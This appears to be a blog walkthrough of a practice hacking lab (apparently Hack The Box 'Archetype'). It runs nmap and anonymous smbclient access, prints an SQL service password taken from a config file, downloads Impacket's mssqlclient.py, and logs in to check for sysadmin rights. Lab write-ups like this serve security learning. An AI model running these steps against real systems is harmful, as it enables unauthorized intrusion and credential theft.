• install oracle virtual box 6.1.16
  • install oracle virtual box extension pack
  • Download Kali .ova file virtual image 2020.3
  • Download the openVPN configuration file
  • start Kali machine and select Terminal
  • change default password for user kali and for root
  • $ passwd kali | to change the default password for user kali
  • switch user to root | $ sudo su | type the password for kali | $ passwd root
  • $ sudo openvpn eu.ovpn
  • The following commands will scan for open ports on a target IP
  • $ ports=$(nmap -p- –min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d ‘/’ -f 1 | tr ‘\n’ ‘,’ | sed s/,$//)
  • $ nmap -sC -sV -p$ports 10.10.10.27
  • Ports 445 and 1433 are open, which are associated with file sharing (SMB) and SQL Server.
  • It is worth checking to see if anonymous access has been permitted, as file shares often store configuration files containing passwords or other sensitive information. We can use smbclient to list available shares.
  • $ smbclient -N -L \\\\10.10.10.27\\
  • It seems there is a share called backups. Let’s attempt to access it and see what’s inside.
  • $ smbclient -N \\\\10.10.10.27\\backups
  • smb: \> dir
  • There is a dtsConfig file, which is a config file used with SSIS.
  • We see that it contains a SQL connection string, containing credentials for the local Windows user ARCHETYPE\sql_svc.
  • Password=M3g4c0rp123
  • local Windows user ARCHETYPE\sql_svc
  • locate your current location | $ pwd
  • create a new directory called tools | $ mkdir tools
  • change location into the tools directory | $ cd tools
  • Download the tool called mssqlclient.py | $ wget http://ingrata.eu/wp-content/uploads/2020/10/mssqlclient.py_.zip
  • extract the required tool | $ unzip mssqlclient.py_.zip
  • delete the zip file | rm mssqlclient.py_.zip
  • Let’s try connecting to the SQL Server using Impacket’s mssqlclient.py.
  • $ python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
  • provide the Password=M3g4c0rp123
  • We can use the IS_SRVROLEMEMBER function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. This is successful, and we do indeed have sysadmin privileges.
  • SQL> SELECT IS_SRVROLEMEMBER (‘sysadmin’)

Leave a Reply

Your email address will not be published. Required fields are marked *